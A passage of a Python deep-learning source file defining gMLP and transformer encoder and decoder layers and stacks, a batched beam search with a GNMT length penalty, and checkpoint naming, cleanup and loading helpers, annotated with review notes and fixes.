        :param nctx: the (fixed) sequence length the spatial projection operates over
        :param activation_type: activation after the channel expansion (default gelu)
        :param d_ff: inner size; defaults to 4 * d_model
        :param ffn_pdrop: dropout rate for ffn_drop (NOTE(review): ffn_drop is constructed
            but not used in forward -- confirm whether it should wrap to_ffn's output)
        :param layer_norm_eps: epsilon for the layer norms
        """
        super().__init__()
        self.d_model = d_model
        self.d_ff = d_ff if d_ff is not None else 4 * d_model
        self.to_ffn = Dense(self.d_model, self.d_ff)
        self.activation = get_activation(activation_type)
        self.ffn_drop = nn.Dropout(ffn_pdrop)
        # The SGU halves the feature dim, so the down-projection starts from d_ff // 2
        self.from_sgu = Dense(self.d_ff//2, self.d_model)
        self.norm = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
        self.dropout = nn.Dropout(pdrop)
        self.spatial_gating_unit = SpatialGatingUnit(self.d_ff, nctx, layer_norm_eps)

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Do gMLP forward

        TODO: we arent using the mask ATM

        :param inputs: `(x, mask)`
        :return: The output tensor
        """
        # The shortcut here happens pretty early
        shortcut, mask = inputs
        # A "channel" norm
        x = self.norm(shortcut)
        # A "channel" FFN
        x = self.dropout(self.to_ffn(x))
        # gelu according to https://arxiv.org/pdf/2105.08050.pdf
        x = self.activation(x)
        # "spatial" projection (over T)
        x = self.spatial_gating_unit(x)
        # "channel" projection
        x = self.from_sgu(x)
        x = self.dropout(x)
        return x + shortcut
class TransformerDecoderBase(nn.Module):
    """Common construction for the transformer decoder layer variants.

    Builds masked self-attention, encoder-decoder (source) attention, the position-wise
    FFN, three layer norms and dropout; subclasses only differ in where the layer norms
    are applied in `forward`.
    """

    def __init__(
        self,
        num_heads: int,
        d_model: int,
        pdrop: float,
        scale: bool = True,
        activation_type: str = "gelu",
        d_ff: Optional[int] = None,
        d_k: Optional[int] = None,
        rpr_k: Optional[int] = None,
        ffn_pdrop: Optional[float] = 0.0,
        layer_norm_eps: float = 1.0e-6,
        rpr_value_on: bool = True,
        ra_type: Optional[str] = None,
    ):
        """
        :param num_heads: The number of attention heads
        :param d_model: The model hidden size
        :param pdrop: dropout applied to the residual branches
        :param scale: Should the dot-product attention be scaled
        :param activation_type: activation for the FFN (default gelu)
        :param d_ff: FFN inner size; defaults to 4 * d_model
        :param d_k: optional explicit per-head dim
        :param rpr_k: if set, use Shaw-style relative attention with this radius
        :param ffn_pdrop: dropout applied inside the FFN
        :param layer_norm_eps: epsilon for the layer norms
        :param rpr_value_on: whether relative attention also learns value embeddings
        :param ra_type: relative-attention bias flavor ('alibi' or 't5') for the non-RPR path
        """
        super().__init__()
        self.d_model = d_model
        self.d_ff = d_ff if d_ff is not None else 4 * d_model
        if rpr_k is not None:
            self.self_attn = MultiHeadedRelativeAttention(num_heads, d_model, rpr_k, pdrop, scale, d_k=d_k, rpr_value_on=rpr_value_on)
            self.src_attn = MultiHeadedRelativeAttention(num_heads, d_model, rpr_k, pdrop, scale, d_k=d_k, rpr_value_on=rpr_value_on)
        else:
            self.self_attn = MultiHeadedAttention(num_heads, d_model, pdrop, scale, d_k=d_k, ra_type=ra_type)
            self.src_attn = MultiHeadedAttention(num_heads, d_model, pdrop, scale, d_k=d_k, ra_type=ra_type)

        # NOTE(review): dropout here precedes the activation, whereas TransformerEncoderBase
        # places activation before dropout -- confirm whether this asymmetry is intentional
        self.ffn = nn.Sequential(
            Dense(self.d_model, self.d_ff),
            nn.Dropout(ffn_pdrop),
            get_activation(activation_type),
            Dense(self.d_ff, self.d_model),
        )

        self.ln1 = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
        self.ln2 = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
        self.ln3 = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
        self.dropout = nn.Dropout(pdrop)
class PreLNTransformerDecoder(TransformerDecoderBase):
    """Pre-layer-norm decoder layer: each residual branch normalizes its input first."""

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """
        :param inputs: `(x, memory, src_mask, tgt_mask)`
        :return: The output tensor
        """
        x, memory, src_mask, tgt_mask = inputs
        # Masked self-attention branch
        normed = self.ln1(x)
        x = x + self.dropout(self.self_attn((normed, normed, normed, tgt_mask)))
        # Encoder-decoder attention branch
        normed = self.ln2(x)
        x = x + self.dropout(self.src_attn((normed, memory, memory, src_mask)))
        # FFN branch
        normed = self.ln3(x)
        x = x + self.dropout(self.ffn(normed))
        return x
class PreLNBeforeResConnTransformerDecoder(TransformerDecoderBase):
    """Decoder layer where layer norm is applied before each residual connection (the normed
    value itself carries into the residual, unlike the classic pre-LN variant)."""

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """
        :param inputs: `(x, memory, src_mask, tgt_mask)`
        :return: The output tensor
        """
        x, memory, src_mask, tgt_mask = inputs
        # Note: each normalized tensor is BOTH the sub-layer input and the residual base
        x = self.ln1(x)
        x = x + self.dropout(self.self_attn((x, x, x, tgt_mask)))
        x = self.ln2(x)
        x = x + self.dropout(self.src_attn((x, memory, memory, src_mask)))
        x = self.ln3(x)
        x = x + self.dropout(self.ffn(x))
        return x
class PostLNTransformerDecoder(TransformerDecoderBase):
    """Post-layer-norm decoder layer (original Transformer ordering): LN follows each residual add.

    Fix: inherit from TransformerDecoderBase (as the other decoder variants and
    PostLNTransformerEncoder do). Inheriting directly from nn.Module left `self_attn`,
    `src_attn`, `ffn`, `ln1`-`ln3` and `dropout` unconstructed, so `forward` raised
    AttributeError on first use.
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """
        :param inputs: `(x, memory, src_mask, tgt_mask)`
        :return: The output tensor
        """
        x, memory, src_mask, tgt_mask = inputs
        x = x + self.dropout(self.self_attn((x, x, x, tgt_mask)))
        x = self.ln2(x)
        x = x + self.dropout(self.src_attn((x, memory, memory, src_mask)))
        x = self.ln3(x)
        x = x + self.dropout(self.ffn(x))
        # ln1 closes the layer (ln2/ln3 sit between the sub-layers)
        x = self.ln1(x)
        return x
class TransformerEncoderStack(nn.Module):
    """A stack of transformer encoder layers with selectable layer-norm placement and optional LayerDrop."""

    def __init__(
        self,
        num_heads: int,
        d_model: int,
        pdrop: float,
        scale: bool = True,
        layers: int = 1,
        activation: str = "relu",
        d_ff: Optional[int] = None,
        d_k: Optional[int] = None,
        rpr_k: Optional[Union[int, List[int]]] = None,
        ffn_pdrop: Optional[float] = 0.0,
        layer_norms_after: bool = False,
        layer_norm_eps: float = 1.0e-6,
        windowed_ra: Optional[bool] = False,
        rpr_value_on: bool = True,
        layer_drop: float = 0.0,
        ra_type: Optional[str] = None,
        transformer_type: Optional[str] = None,
        **kwargs,
    ):
        """
        :param num_heads: The number of attention heads per layer
        :param d_model: The model hidden size
        :param pdrop: residual-branch dropout
        :param scale: Should the dot-product attention be scaled
        :param layers: number of encoder layers
        :param activation: activation for the FFN
        :param d_ff: FFN inner size; defaults to 4 * d_model
        :param d_k: optional explicit per-head dim
        :param rpr_k: relative attention radius; a scalar is broadcast to all layers
        :param ffn_pdrop: dropout inside the FFN
        :param layer_norms_after: legacy flag for the post-layer-norm variant
        :param layer_norm_eps: epsilon for the layer norms
        :param windowed_ra: whether to prevent attention beyond rpr_k
        :param rpr_value_on: whether relative attention also learns value embeddings
        :param layer_drop: LayerDrop probability (each layer is skipped with this prob at train time)
        :param ra_type: relative-attention bias flavor ('alibi' or 't5')
        :param transformer_type: 'post-layer-norm', 'pre-layer-norm', or anything else for
            the pre-layer-norm-before-resconn variant
            (fix: default was the literal `False`, contradicting the Optional[str]
            annotation and the sibling stacks, which default to None; behavior of the
            `==` dispatch below is unchanged)
        """
        super().__init__()
        self.encoders = nn.ModuleList()
        if layer_norms_after or transformer_type == "post-layer-norm":
            logger.info("Using post-layer-norm transformer (encoder)")
            TransformerEncoder = PostLNTransformerEncoder
            # Each post-LN layer already normalizes its output, so no final LN is needed
            self.ln = nn.Identity()
        elif transformer_type == "pre-layer-norm":
            TransformerEncoder = PreLNTransformerEncoder
            self.ln = nn.LayerNorm(d_model, eps=layer_norm_eps)
        else:  # transformer_type == "pre-layer-norm-before-resconn"
            logger.info("Using layer norm before residual connections (encoder)")
            # Defensive check (layer_norms_after=True is already routed to the first branch)
            if layer_norms_after:
                raise Exception(f"Mutually exclusive options ({transformer_type}) and layer_norms_after=True)",)
            TransformerEncoder = PreLNBeforeResConnTransformerEncoder
            self.ln = nn.LayerNorm(d_model, eps=layer_norm_eps)
        self.output_dim = d_model
        self.layer_drop = layer_drop
        # Broadcast a scalar (or singleton-list) rpr_k to every layer
        if not is_sequence(rpr_k):
            rpr_k = [rpr_k] * layers
        elif len(rpr_k) == 1:
            rpr_k = [rpr_k[0]] * layers
        for i in range(layers):
            self.encoders.append(
                TransformerEncoder(
                    num_heads, d_model, pdrop, scale, activation, d_ff, d_k,
                    rpr_k=rpr_k[i], ffn_pdrop=ffn_pdrop,
                    layer_norm_eps=layer_norm_eps, windowed_ra=windowed_ra, rpr_value_on=rpr_value_on, ra_type=ra_type
                )
            )

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Run the layer stack with LayerDrop, then the final (possibly identity) layer norm.

        :param inputs: `(x, mask)`
        :return: The output tensor [B, T, d_model]
        """
        x, mask = inputs
        for layer in self.encoders:
            # LayerDrop: at train time skip each layer with probability layer_drop
            pdrop = np.random.random()
            if not self.training or (pdrop >= self.layer_drop):
                x = layer((x, mask))
        return self.ln(x)
class GatedMLPEncoderStack(nn.Module):
    """A stack of gMLP blocks, following https://arxiv.org/pdf/2105.08050.pdf

    Applies `layers` GatedMLPEncoder blocks (with optional LayerDrop) followed by a
    final layer norm.
    """

    def __init__(
        self,
        d_model: int,
        pdrop: float,
        layers: int = 1,
        nctx: int = 256,
        activation: str = "gelu",
        d_ff: Optional[int] = None,
        ffn_pdrop: Optional[float] = 0.0,
        layer_norm_eps: float = 1.0e-6,
        layer_drop: float = 0.0,
        **kwargs,
    ):
        """
        :param d_model: The model hidden size
        :param pdrop: dropout applied inside each block
        :param layers: number of gMLP blocks
        :param nctx: the fixed context length the spatial gating operates over
        :param activation: activation after the channel expansion
        :param d_ff: inner size; defaults to 4 * d_model inside each block
        :param ffn_pdrop: FFN dropout passed to each block
        :param layer_norm_eps: epsilon for the layer norms
        :param layer_drop: LayerDrop probability (each block skipped with this prob at train time)
        """
        super().__init__()
        self.encoders = nn.ModuleList()
        self.ln = nn.LayerNorm(d_model, eps=layer_norm_eps)
        self.output_dim = d_model
        self.layer_drop = layer_drop
        for i in range(layers):
            self.encoders.append(
                GatedMLPEncoder(
                    d_model, pdrop, nctx, activation, d_ff,
                    ffn_pdrop=ffn_pdrop,
                    layer_norm_eps=layer_norm_eps,
                )
            )

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Run the block stack with LayerDrop, then the final layer norm.

        :param inputs: `(x, mask)` -- mask is forwarded but currently unused by the blocks
        :return: The output tensor [B, T, d_model]
        """
        x, mask = inputs
        for layer in self.encoders:
            # LayerDrop: at train time skip each block with probability layer_drop
            pdrop = np.random.random()
            if not self.training or (pdrop >= self.layer_drop):
                x = layer((x, mask))
        return self.ln(x)
class TransformerEncoderStackWithLengths(TransformerEncoderStack):
    """A transformer encoder stack that takes `(x, lengths)` and builds a sequence mask itself.

    Also projects the input to d_model first, so the raw input size may differ from d_model.
    """

    def __init__(
        self,
        num_heads: int,
        d_model: int,
        pdrop: float,
        scale: bool = True,
        layers: int = 1,
        activation: str = "relu",
        d_ff: Optional[int] = None,
        d_k: Optional[int] = None,
        rpr_k: Optional[Union[int, List[int]]] = None,
        input_sz: Optional[int] = None,
        ffn_pdrop: Optional[float] = 0.0,
        layer_norms_after: bool = False,
        layer_norm_eps: float = 1.0e-6,
        windowed_ra: Optional[bool] = False,
        rpr_value_on: bool = True,
        layer_drop: float = 0.0,
        ra_type: Optional[str] = None,
        transformer_type: Optional[str] = None,
        **kwargs,
    ):
        """See TransformerEncoderStack for the shared parameters.

        :param input_sz: the raw input feature size projected up/down to d_model
            (NOTE(review): defaults to None but is required -- pytorch_linear(None, ...)
            would fail; confirm callers always pass it)
        """
        super().__init__(num_heads, d_model, pdrop, scale, layers, activation, d_ff, d_k, rpr_k,
                         ffn_pdrop, layer_norms_after, layer_norm_eps, windowed_ra, rpr_value_on, layer_drop, ra_type, transformer_type, **kwargs)
        # Input projection to d_model, with dropout
        self.proj = WithDropout(pytorch_linear(input_sz, d_model), pdrop)

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Project the input, derive a [B, 1, 1, T] sequence mask from lengths, and run the stack.

        :param inputs: `(x, lengths)`
        :return: The output tensor [B, T, d_model]
        """
        x, lengths = inputs
        x = self.proj(x)
        max_seqlen = x.shape[1]
        mask = sequence_mask(lengths, max_seqlen).to(x.device)
        return super().forward((x, mask.unsqueeze(1).unsqueeze(1)))
class TransformerEncoderStackWithTimeMask(TransformerEncoderStack):
    """A transformer encoder stack that applies a causal (subsequent) time mask.

    Takes `(x, lengths)` but the mask is purely causal; lengths are not used for masking.
    Also projects the input to d_model first.
    """

    def __init__(
        self,
        num_heads: int,
        d_model: int,
        pdrop: float,
        scale: bool = True,
        layers: int = 1,
        activation: str = "relu",
        d_ff: Optional[int] = None,
        d_k: Optional[int] = None,
        rpr_k: Optional[Union[int, List[int]]] = None,
        input_sz: Optional[int] = None,
        ffn_pdrop: Optional[float] = 0.0,
        layer_norms_after: bool = False,
        layer_norm_eps: float = 1.0e-6,
        windowed_ra: Optional[bool] = False,
        rpr_value_on: bool = True,
        layer_drop: float = 0.0,
        ra_type: Optional[str] = None,
        transformer_type: Optional[str] = None,
        **kwargs,
    ):
        """See TransformerEncoderStack for the shared parameters.

        :param input_sz: the raw input feature size projected up/down to d_model
            (NOTE(review): defaults to None but is required -- pytorch_linear(None, ...)
            would fail; confirm callers always pass it)
        """
        super().__init__(num_heads, d_model, pdrop, scale, layers, activation, d_ff, d_k, rpr_k,
                         ffn_pdrop, layer_norms_after, layer_norm_eps, windowed_ra, rpr_value_on, layer_drop, ra_type, transformer_type, **kwargs)
        # Input projection to d_model, with dropout
        self.proj = WithDropout(pytorch_linear(input_sz, d_model), pdrop)

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Project the input, build a causal [1, 1, T, T] mask, and run the stack.

        :param inputs: `(x, lengths)` -- lengths are ignored; masking is causal only
        :return: The output tensor [B, T, d_model]
        """
        x, lengths = inputs
        x = self.proj(x)
        max_seqlen = x.shape[1]
        mask = subsequent_mask(max_seqlen).to(x.device)
        return super().forward((x, mask.unsqueeze(1).unsqueeze(1)))
class TransformerDecoderStack(nn.Module):
    """A stack of transformer decoder layers with selectable layer-norm placement and optional LayerDrop."""

    def __init__(
        self,
        num_heads: int,
        d_model: int,
        pdrop: float,
        scale: bool = True,
        layers: int = 1,
        activation_type: str = "relu",
        d_ff: Optional[int] = None,
        d_k: Optional[int] = None,
        rpr_k: Optional[Union[int, List[int]]] = None,
        ffn_pdrop: Optional[float] = 0.0,
        layer_norms_after: bool = False,
        layer_norm_eps: float = 1.0e-6,
        layer_drop: float = 0.0,
        rpr_value_on: bool = True,
        ra_type: Optional[str] = None,
        transformer_type: Optional[str] = None,
        **kwargs,
    ):
        """
        :param num_heads: The number of attention heads per layer
        :param d_model: The model hidden size
        :param pdrop: residual-branch dropout
        :param scale: Should the dot-product attention be scaled
        :param layers: number of decoder layers
        :param activation_type: activation for the FFN
        :param d_ff: FFN inner size; defaults to 4 * d_model
        :param d_k: optional explicit per-head dim
        :param rpr_k: relative attention radius; a scalar is broadcast to all layers
        :param ffn_pdrop: dropout inside the FFN
        :param layer_norms_after: legacy flag for the post-layer-norm variant
        :param layer_norm_eps: epsilon for the layer norms
        :param layer_drop: LayerDrop probability (each layer skipped with this prob at train time)
        :param rpr_value_on: whether relative attention also learns value embeddings
        :param ra_type: relative-attention bias flavor ('alibi' or 't5')
        :param transformer_type: 'post-layer-norm', 'pre-layer-norm', or anything else for
            the pre-layer-norm-before-resconn variant
        """
        super().__init__()
        self.decoders = nn.ModuleList()
        self.layer_drop = layer_drop
        if layer_norms_after or transformer_type == "post-layer-norm":
            logger.info("Using post-layer-norm transformer (decoder)")
            TransformerDecoder = PostLNTransformerDecoder
            # Each post-LN layer already normalizes its output, so no final LN is needed
            self.ln = nn.Identity()
        elif transformer_type == "pre-layer-norm":
            TransformerDecoder = PreLNTransformerDecoder
            self.ln = nn.LayerNorm(d_model, eps=layer_norm_eps)
        else:  # transformer_type == "pre-layer-norm-before-resconn"
            logger.info("Using layer norm before residual connections (decoder)")
            # Defensive check (layer_norms_after=True is already routed to the first branch)
            if layer_norms_after:
                raise Exception(f"Mutually exclusive options ({transformer_type}) and layer_norms_after=True)",)
            TransformerDecoder = PreLNBeforeResConnTransformerDecoder
            self.ln = nn.LayerNorm(d_model, eps=layer_norm_eps)

        # Broadcast a scalar (or singleton-list) rpr_k to every layer
        if not is_sequence(rpr_k):
            rpr_k = [rpr_k] * layers
        elif len(rpr_k) == 1:
            rpr_k = [rpr_k[0]] * layers

        for i in range(layers):
            self.decoders.append(
                TransformerDecoder(num_heads, d_model, pdrop, scale, activation_type, d_ff,
                                   d_k=d_k, rpr_k=rpr_k[i], ffn_pdrop=ffn_pdrop,
                                   layer_norm_eps=layer_norm_eps,
                                   rpr_value_on=rpr_value_on, ra_type=ra_type)
            )

    def forward(self, inputs):
        """Run the layer stack with LayerDrop, then the final (possibly identity) layer norm.

        :param inputs: `(x, memory, src_mask, tgt_mask)`
        :return: The output tensor [B, T, d_model]
        """
        x, memory, src_mask, tgt_mask = inputs
        for layer in self.decoders:
            # LayerDrop: at train time skip each layer with probability layer_drop
            pdrop = np.random.random()
            if not self.training or (pdrop >= self.layer_drop):
                x = layer((x, memory, src_mask, tgt_mask))
        return self.ln(x)
def update_lengths(lengths, eoses, idx):
    """Update the length of a generated tensor based on the first EOS found.

    This is useful for a decoding situation where tokens after an EOS
    can be something other than EOS. This also makes sure that a second
    generated EOS doesn't affect the lengths.

    :param lengths: `torch.LongTensor`: The lengths where zero means an
        unfinished sequence.
    :param eoses: `torch.ByteTensor`: A mask that has 1 for sequences that
        generated an EOS.
    :param idx: `int`: What value to fill the finished lengths with (normally
        the current decoding timestep).
    :returns: `torch.Tensor`: The updated lengths tensor (same shape and type).
    """
    # A sequence is only assigned a length the FIRST time it emits EOS:
    # it must still be unfinished (length 0) AND emit EOS at this step.
    first_eos = (lengths == 0) & eoses
    return lengths.masked_fill(first_eos, idx)
def gnmt_length_penalty(lengths, alpha=0.8):
    """Calculate a length penalty from https://arxiv.org/pdf/1609.08144.pdf

    The paper states the penalty as (5 + |Y|)^a / (5 + 1)^a. This is implemented
    as ((5 + |Y|) / 6)^a for a (very) tiny performance boost

    :param lengths: `torch.LongTensor`: [B, K] The lengths of the beams.
    :param alpha: `float`: A hyperparameter. See Table 2 for a search on this
        parameter.
    :returns:
        `torch.FloatTensor`: [B, K, 1] The penalties.
    """
    scaled = (5.0 + lengths.to(torch.float)) / 6.0
    return torch.pow(scaled, alpha).unsqueeze(-1)
def no_length_penalty(lengths):
    """A dummy penalty that always returns 1, leaving beam scores unchanged.

    :param lengths: `torch.LongTensor`: [B, K] beam lengths (values unused)
    :returns: `torch.FloatTensor`: [B, K, 1] of ones
    """
    return torch.ones_like(lengths, dtype=torch.float).unsqueeze(-1)
def repeat_batch(t, K, dim=0):
    """Repeat a tensor while keeping the concept of a batch.

    Each batch element is repeated K times *in place* (adjacent copies), unlike
    `Tensor.repeat`, which tiles the whole batch.

    :param t: `torch.Tensor`: The tensor to repeat.
    :param K: `int`: The number of times to repeat the tensor.
    :param dim: `int`: The dimension to repeat in. This should be the
        batch dimension.

    :returns: `torch.Tensor`: The repeated tensor. The new shape will be
        batch size * K at dim, the rest of the shapes will be the same.

    Example::

        >>> a = torch.arange(10).view(2, -1)
        >>> a
        tensor([[0, 1, 2, 3, 4],
                [5, 6, 7, 8, 9]])
        >>> repeat_batch(a, 2)
        tensor([[0, 1, 2, 3, 4],
                [0, 1, 2, 3, 4],
                [5, 6, 7, 8, 9],
                [5, 6, 7, 8, 9]])
    """
    shape = t.shape
    # Insert a new axis right after `dim`, tile it K times, then fold it back in,
    # which interleaves the copies per batch element
    reps = [1] * (len(shape) + 1)
    reps[dim + 1] = K
    tiled = t.unsqueeze(dim + 1).repeat(reps)
    out_shape = list(shape)
    out_shape[dim] = shape[dim] * K
    return tiled.view(out_shape)
class BeamSearchBase:
    """Batched beam search driver.

    Subclasses supply the model-specific pieces by overriding `init`, `step` and
    `update`; `__call__` implements the generic search loop.
    """

    def __init__(self, beam=1, length_penalty=None, **kwargs):
        # Fall back to no penalty (constant 1) when none is supplied
        self.length_penalty = length_penalty if length_penalty else no_length_penalty
        self.K = beam

    def init(self, encoder_outputs):
        """Hook: initialize any decoding state from the encoder outputs; returns `extra`."""
        pass

    def step(self, paths, extra):
        """Hook: one decoding step; returns (log-probs over vocab, updated extra)."""
        pass

    def update(self, beams, extra):
        """Hook: reorder decoding state to follow the selected beams; returns updated extra."""
        pass

    def __call__(self, encoder_outputs, **kwargs):
        """Perform batched Beam Search.

        Note:
            The paths and lengths generated do not include the <GO> token.

        :param encoder_outputs: `namedtuple` The outputs of the encoder class.
        :param init: `Callable(ecnoder_outputs: encoder_outputs, K: int)` -> Any: A
            callable that is called once at the start of the search to initialize
            things. This returns a blob that is passed to other callables.
        :param step: `Callable(paths: torch.LongTensor, extra) -> (probs: torch.FloatTensor, extra):
            A callable that is does a single decoding step. It returns the log
            probabilities over the vocabulary in the last dimension. It also returns
            any state the decoding process needs.
        :param update: `Callable(beams: torch.LongTensor, extra) -> extra:
            A callable that is called to edit the decoding state based on the selected
            best beams.
        :param length_penalty: `Callable(lengths: torch.LongTensor) -> torch.floatTensor
            A callable that generates a penalty based on the lengths. Lengths is
            [B, K] and the returned penalty should be [B, K, 1] (or [B, K, V] to
            have token based penalties?)

        :Keyword Arguments:
        * *beam* -- `int`: The number of beams to use.
        * *mxlen* -- `int`: The max number of steps to run the search for.

        :returns:
            tuple(preds: torch.LongTensor, lengths: torch.LongTensor, scores: torch.FloatTensor)
            preds: The predicted values: [B, K, max(lengths)]
            lengths: The length of each prediction [B, K]
            scores: The score of each path [B, K]
        """
        mxlen = kwargs.get("mxlen", 100)
        bsz = encoder_outputs.output.shape[0]
        device = encoder_outputs.output.device
        with torch.no_grad():
            extra = self.init(encoder_outputs)
            # Every beam starts from the <GO> token
            paths = torch.full((bsz, self.K, 1), Offsets.GO, dtype=torch.long, device=device)
            # This tracks the log prob of each beam. This is distinct from score which
            # is based on the log prob and penalties.
            log_probs = torch.zeros((bsz, self.K), dtype=torch.float, device=device)
            # Tracks the lengths of the beams, unfinished beams have lengths of zero.
            lengths = torch.zeros((bsz, self.K), dtype=torch.long, device=device)

            for i in range(mxlen - 1):
                probs, extra = self.step(paths, extra)
                V = probs.shape[-1]
                probs = probs.view((bsz, self.K, V))  # [B, K, V]
                if i > 0:
                    # This mask is for all beams that are done.
                    done_mask = (lengths != 0).unsqueeze(-1)  # [B, K, 1]
                    # Can creating this mask be moved out of the loop? It never changes but we don't have V
                    # This mask selects the EOS token
                    eos_mask = torch.zeros((1, 1, V), dtype=done_mask.dtype, device=device)
                    eos_mask[:, :, Offsets.EOS] = 1
                    # This mask selects the EOS token of only the beams that are done.
                    mask = done_mask & eos_mask
                    # Put all probability mass on the EOS token for finished beams.
                    # Otherwise as the other beams get longer they will all give
                    # up and eventually select this beam and all outputs become
                    # the same.
                    probs = probs.masked_fill(done_mask, -np.inf)
                    probs = probs.masked_fill(mask, 0)
                    probs = log_probs.unsqueeze(-1) + probs  # [B, K, V]
                    # Calculate the score of the beam based on the current length.
                    # Unfinished beams (length 0) are scored as if they end at this step.
                    path_scores = probs / self.length_penalty(lengths.masked_fill(lengths == 0, i + 1))
                else:
                    # On the first step we only look at probabilities for the first beam.
                    # If we don't then the probs will be the same for each beam
                    # This means the same token will be selected for each beam
                    # And we won't get any diversity.
                    # Using only the first beam ensures K different starting points.
                    path_scores = probs[:, 0, :]

                flat_scores = path_scores.view(bsz, -1)  # [B, K * V]
                best_scores, best_idx = flat_scores.topk(self.K, 1)
                # Get the log_probs of the best scoring beams
                log_probs = probs.view(bsz, -1).gather(1, best_idx).view(bsz, self.K)

                # NOTE(review): `//` on tensors emits a floor_divide deprecation warning on
                # newer torch; torch.div(..., rounding_mode='trunc') is the modern spelling
                best_beams = best_idx // V  # Get which beam it came from
                best_idx = best_idx % V  # Get the index of the word regardless of which beam it is.

                # Best Beam index is relative within the batch (only [0, K)).
                # This makes the index global (e.g. best beams for the second
                # batch example is in [K, 2*K)).
                offsets = torch.arange(bsz, dtype=torch.long, device=device) * self.K
                offset_beams = best_beams + offsets.unsqueeze(-1)
                flat_beams = offset_beams.view(bsz * self.K)
                # Select the paths to extend based on the best beams
                flat_paths = paths.view(bsz * self.K, -1)
                new_paths = flat_paths[flat_beams, :].view(bsz, self.K, -1)
                # Add the selected outputs to the paths
                paths = torch.cat([new_paths, best_idx.unsqueeze(-1)], dim=2)

                # Select the lengths to keep tracking based on the valid beams left.
                lengths = lengths.view(-1)[flat_beams].view((bsz, self.K))
                extra = self.update(flat_beams, extra)

                # Updated lengths based on if we hit EOS
                last = paths[:, :, -1]
                eoses = last == Offsets.EOS
                lengths = update_lengths(lengths, eoses, i + 1)
                if (lengths != 0).all():
                    break
            else:
                # This runs if the loop didn't break meaning one beam hit the max len
                # Add an EOS to anything that hasn't hit the end. This makes the scores real.
                probs, extra = self.step(paths, extra)
                V = probs.size(-1)
                probs = probs.view((bsz, self.K, V))
                probs = probs[:, :, Offsets.EOS]  # Select the score of EOS
                # If any of the beams are done mask out the score of this EOS (they already had an EOS)
                probs = probs.masked_fill((lengths != 0), 0)
                log_probs = log_probs + probs
                end_tokens = torch.full((bsz, self.K, 1), Offsets.EOS, device=device, dtype=paths.dtype)
                paths = torch.cat([paths, end_tokens], dim=2)
                lengths = update_lengths(lengths, torch.ones_like(lengths) == 1, mxlen)
            # NOTE(review): this repeats the fill done in the for-else above and is a no-op
            # whenever the loop broke early (all lengths nonzero) -- appears to be a
            # belt-and-braces safety net; confirm before removing
            lengths = update_lengths(lengths, torch.ones_like(lengths) == 1, mxlen)
            best_scores = log_probs / self.length_penalty(lengths).squeeze(-1)
            # Slice off the Offsets.GO token
            paths = paths[:, :, 1:]
            return paths, lengths, best_scores
def checkpoint_for(model_base, epoch, tick_type='epoch'):
    """Build the file name (sans extension) for a checkpoint.

    :param model_base: Base path/prefix for checkpoint files
    :param epoch: Zero-based tick counter; the name embeds the one-based value
    :param tick_type: The unit of the counter, e.g. `epoch` or `step`
    :return: A string of the form `{model_base}-{tick_type}-{epoch + 1}`
    """
    return f"{model_base}-{tick_type}-{epoch + 1}"
def rm_old_checkpoints(base_path, current_epoch, last_n=10):
    """Delete checkpoint files older than the most recent `last_n` epochs.

    Both the `.pth` and `.npz` variants of each stale checkpoint are removed
    when they exist; missing files are silently skipped.

    :param base_path: Base path/prefix the checkpoints were saved under
    :param current_epoch: The current (exclusive) epoch counter
    :param last_n: How many of the most recent checkpoints to keep
    """
    oldest_to_keep = current_epoch - last_n
    for epoch in range(oldest_to_keep):
        stem = checkpoint_for(base_path, epoch)
        for suffix in ('.pth', '.npz'):
            candidate = stem + suffix
            if os.path.exists(candidate):
                os.remove(candidate)
def find_latest_checkpoint(checkpoint_dir: str, wildcard="checkpoint") -> Tuple[str, int]:
    """Find the checkpoint in `checkpoint_dir` with the highest step number.

    Checkpoint files are expected to look like `{wildcard}*-{step}.pth` or
    `{wildcard}*-{step}.npz`; the token after the final `-` (with the extension
    stripped) is parsed as the step.

    :param checkpoint_dir: Directory to search
    :param wildcard: Filename prefix identifying checkpoint files
    :return: A `(path, step)` tuple; `(None, 0)` when nothing matched
    """
    step_num = 0
    # FIX: `checkpoint` was previously unbound when no file matched, so the
    # final return raised UnboundLocalError instead of signaling "not found"
    checkpoint = None
    for f in glob.glob(os.path.join(checkpoint_dir, f"{wildcard}*")):
        base = os.path.basename(f)
        if "-" not in base:
            continue
        last = base.split("-")[-1]
        for x in ('.pth', '.npz'):
            last = last.replace(x, '', -1)
        # FIX: skip files whose trailing token is not a step number instead of
        # crashing on `int(...)` (e.g. `checkpoint-best.pth`)
        if not last.isdigit():
            continue
        this_step_num = int(last)
        if this_step_num > step_num:
            checkpoint = f
            step_num = this_step_num
    return checkpoint, step_num
def save_checkpoint(model: torch.nn.Module, model_base: str, count: int, tick_type: str = 'epoch', save_npz: bool = False):
    """Save a checkpoint as a PyTorch `.pth` state dict (and optionally as `.npz`).

    :param model: The model to save; a DDP/DataParallel wrapper is unwrapped via `.module` first
    :param model_base: Base path/prefix for the checkpoint name
    :param count: Zero-based tick counter used to form the checkpoint name
    :param tick_type: The unit of the counter, e.g. `epoch` or `step`
    :param save_npz: If True, also export the weights in npz form, choosing an
        exporter based on the model's structure
    """
    checkpoint_name = checkpoint_for(model_base, count, tick_type=tick_type)
    # Its possible due to how its called that we might save the same checkpoint twice if we dont check first
    # FIX: previously this tested the extension-less name, which is never what
    # gets written (the file is saved as `checkpoint_name + '.pth'`), so the
    # duplicate-save guard never fired
    if os.path.exists(checkpoint_name + '.pth'):
        logger.info("Checkpoint already exists: %s", checkpoint_name)
        return
    logger.info("Creating checkpoint: %s", checkpoint_name)
